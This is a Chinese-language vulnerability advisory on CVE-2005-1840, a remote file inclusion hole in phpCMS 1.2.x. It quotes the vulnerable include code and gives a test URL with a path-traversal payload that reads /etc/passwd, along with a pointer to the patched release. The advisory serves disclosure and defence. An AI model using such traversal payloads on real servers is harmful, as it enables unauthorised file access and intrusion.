发布日期：2005-06-03
更新日期：2005-06-03

受影响系统：

phpCMS phpCMS 1.2.1pl1
phpCMS phpCMS 1.2.1
phpCMS phpCMS 1.2.0

不受影响系统：

phpCMS phpCMS 1.2.1pl2

描述：

---

CVE(CAN) ID: CVE-2005-1840

phpCMS是灵活、高效的内容管理系统。

phpCMS中存在服务器端任意文件包含漏洞，起因是在进行会话检查前调用了include语句。远程攻击者可以未经认证利用这个漏洞执行任意代码。

有漏洞的include调用位于class.layout_phpcms.php中：

if(isset($_GET['language']) && $_GET['language'] != '') {
    include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
[...]

<*来源：sk0L （bmu@sec-consult.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111773774916907&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://vu1n.com/parser/parser.php?&phpcmsaction=FILEMANAGER&language=de/../../../../../../../etc/passwd

建议：

---

厂商补丁：

phpCMS
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载phpCMS 1.2.1pl2：

http://www.phpcms.de/download/

浏览次数：3149
严重程度：0（网友投票）